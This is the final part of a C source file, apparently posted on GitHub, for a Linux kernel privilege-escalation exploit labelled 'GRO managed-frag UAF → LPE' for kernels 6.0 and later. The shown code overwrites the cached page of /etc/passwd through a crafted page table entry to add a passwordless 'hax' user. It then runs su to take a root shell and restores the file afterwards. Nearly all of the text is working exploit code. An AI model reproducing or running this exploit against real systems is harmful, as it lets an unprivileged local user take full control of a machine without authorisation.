| ssize_t passwd_len = pread(passwd_fd, real_passwd, PAGE_SIZE, 0); | |
| if (passwd_len <= 0) { | |
| fprintf(stderr, "[-] pread %s: %s\n", PASSWD_PATH, strerror(errno)); | |
| munmap(slot0, PAGE_SIZE); | |
| close(passwd_fd); close(pipe_B[0]); close(pipe_B[1]); | |
| (void)!write(done_wr, "NO", 2); | |
| return -1; | |
| } | |
| /* Construct corrupted page: prepend payload before original content. | |
| * We must stay within i_size — appending past EOF is invisible to read(). */ | |
| char corrupt_page[PAGE_SIZE]; | |
| memset(corrupt_page, 0, PAGE_SIZE); | |
| memcpy(corrupt_page, PAYLOAD, PAYLOAD_LEN); | |
| int remaining = PAGE_SIZE - PAYLOAD_LEN; | |
| if (passwd_len < remaining) | |
| remaining = passwd_len; | |
| memcpy(corrupt_page + PAYLOAD_LEN, real_passwd, remaining); | |
| fprintf(stderr, "[*] writing payload through crafted PTE at %p...\n", rw_page); | |
| memcpy(rw_page, corrupt_page, PAGE_SIZE); | |
| fprintf(stderr, "[+] write succeeded — /etc/passwd page cache corrupted!\n"); | |
| /* Verify */ | |
| close(passwd_fd); | |
| passwd_fd = open(PASSWD_PATH, O_RDONLY); | |
| char verify[PAGE_SIZE]; | |
| memset(verify, 0, PAGE_SIZE); | |
| if (passwd_fd >= 0) { | |
| (void)!read(passwd_fd, verify, PAGE_SIZE); | |
| close(passwd_fd); | |
| } | |
| if (strstr(verify, PAYLOAD)) { | |
| fprintf(stderr, "[+] VERIFIED — hax user injected into /etc/passwd!\n"); | |
| (void)!write(done_wr, "OK", 2); | |
| char wait_buf; | |
| (void)!read(wait_rd, &wait_buf, 1); | |
| munmap(slot0, PAGE_SIZE); | |
| close(pipe_B[0]); close(pipe_B[1]); | |
| return 0; | |
| } | |
| fprintf(stderr, "[-] corruption not visible in /etc/passwd\n"); | |
| fprintf(stderr, " first 120 bytes: %.120s\n", verify); | |
| munmap(slot0, PAGE_SIZE); | |
| close(pipe_B[0]); close(pipe_B[1]); | |
| (void)!write(done_wr, "NO", 2); | |
| return -1; | |
| } | |
| /* ---- privilege escalation ---- */ | |
| static void do_escalate(void) | |
| { | |
| fprintf(stderr, "[*] escalating privileges via su...\n"); | |
| int master; | |
| pid_t pid = forkpty(&master, NULL, NULL, NULL); | |
| if (pid < 0) { perror("forkpty"); return; } | |
| if (pid == 0) { | |
| execlp("su", "su", "hax", NULL); | |
| _exit(1); | |
| } | |
| usleep(500000); | |
| char buf[4096]; | |
| ssize_t n; | |
| struct timeval tv = {.tv_sec = 2}; | |
| fd_set fds; | |
| FD_ZERO(&fds); | |
| FD_SET(master, &fds); | |
| if (select(master + 1, &fds, NULL, NULL, &tv) > 0) { | |
| n = read(master, buf, sizeof(buf) - 1); | |
| if (n > 0) { | |
| buf[n] = '\0'; | |
| if (strstr(buf, "Password") || strstr(buf, "password")) { | |
| (void)!write(master, "\n", 1); | |
| usleep(500000); | |
| } | |
| } | |
| } | |
| fprintf(stderr, "[*] restoring /etc/passwd...\n"); | |
| char restore_cmd[256]; | |
| snprintf(restore_cmd, sizeof(restore_cmd), | |
| "cp %s %s 2>/dev/null; rm -f %s\n", BACKUP_PATH, PASSWD_PATH, BACKUP_PATH); | |
| (void)!write(master, restore_cmd, strlen(restore_cmd)); | |
| usleep(500000); | |
| (void)!write(master, "id\n", 3); | |
| usleep(300000); | |
| FD_ZERO(&fds); | |
| FD_SET(master, &fds); | |
| tv.tv_sec = 2; | |
| if (select(master + 1, &fds, NULL, NULL, &tv) > 0) { | |
| n = read(master, buf, sizeof(buf) - 1); | |
| if (n > 0) { | |
| buf[n] = '\0'; | |
| if (strstr(buf, "uid=0")) { | |
| fprintf(stderr, "[+] got root! dropping to interactive shell\n\n"); | |
| relay_pty(master); | |
| return; | |
| } | |
| } | |
| } | |
| fprintf(stderr, "[-] escalation failed\n"); | |
| kill(pid, SIGTERM); | |
| waitpid(pid, NULL, 0); | |
| } | |
| int main(void) | |
| { | |
| fprintf(stderr, "=== GRO managed-frag UAF → LPE ===\n"); | |
| fprintf(stderr, "kernels 6.0+ | unprivileged | no BPF\n\n"); | |
| fprintf(stderr, "[*] backing up /etc/passwd...\n"); | |
| if (do_backup() < 0) { | |
| fprintf(stderr, "[-] backup failed\n"); | |
| return 1; | |
| } | |
| fprintf(stderr, "[+] backup at %s\n", BACKUP_PATH); | |
| /* Signaling pipes: child tells parent success/fail, parent tells child to exit */ | |
| int done_pipe[2], wait_pipe[2]; | |
| if (pipe(done_pipe) < 0 || pipe(wait_pipe) < 0) { | |
| perror("signal pipes"); | |
| return 1; | |
| } | |
| pid_t exploit_pid = fork(); | |
| if (exploit_pid < 0) { perror("fork"); return 1; } | |
| if (exploit_pid == 0) { | |
| close(done_pipe[0]); | |
| close(wait_pipe[1]); | |
| _exit(do_corrupt(done_pipe[1], wait_pipe[0]) == 0 ? 0 : 1); | |
| } | |
| close(done_pipe[1]); | |
| close(wait_pipe[0]); | |
| /* Wait for child to signal corruption result */ | |
| char result[4] = {0}; | |
| ssize_t rn = read(done_pipe[0], result, sizeof(result)); | |
| close(done_pipe[0]); | |
| if (rn < 2 || result[0] != 'O') { | |
| fprintf(stderr, "[-] exploit failed, restoring...\n"); | |
| (void)!write(wait_pipe[1], "X", 1); | |
| close(wait_pipe[1]); | |
| waitpid(exploit_pid, NULL, 0); | |
| do_restore(); | |
| return 1; | |
| } | |
| /* Child holds pipe_B open — escalate while page cache page is pinned */ | |
| do_escalate(); | |
| /* Tell child it can exit now (closes pipe_B) */ | |
| (void)!write(wait_pipe[1], "X", 1); | |
| close(wait_pipe[1]); | |
| waitpid(exploit_pid, NULL, 0); | |
| do_restore(); | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment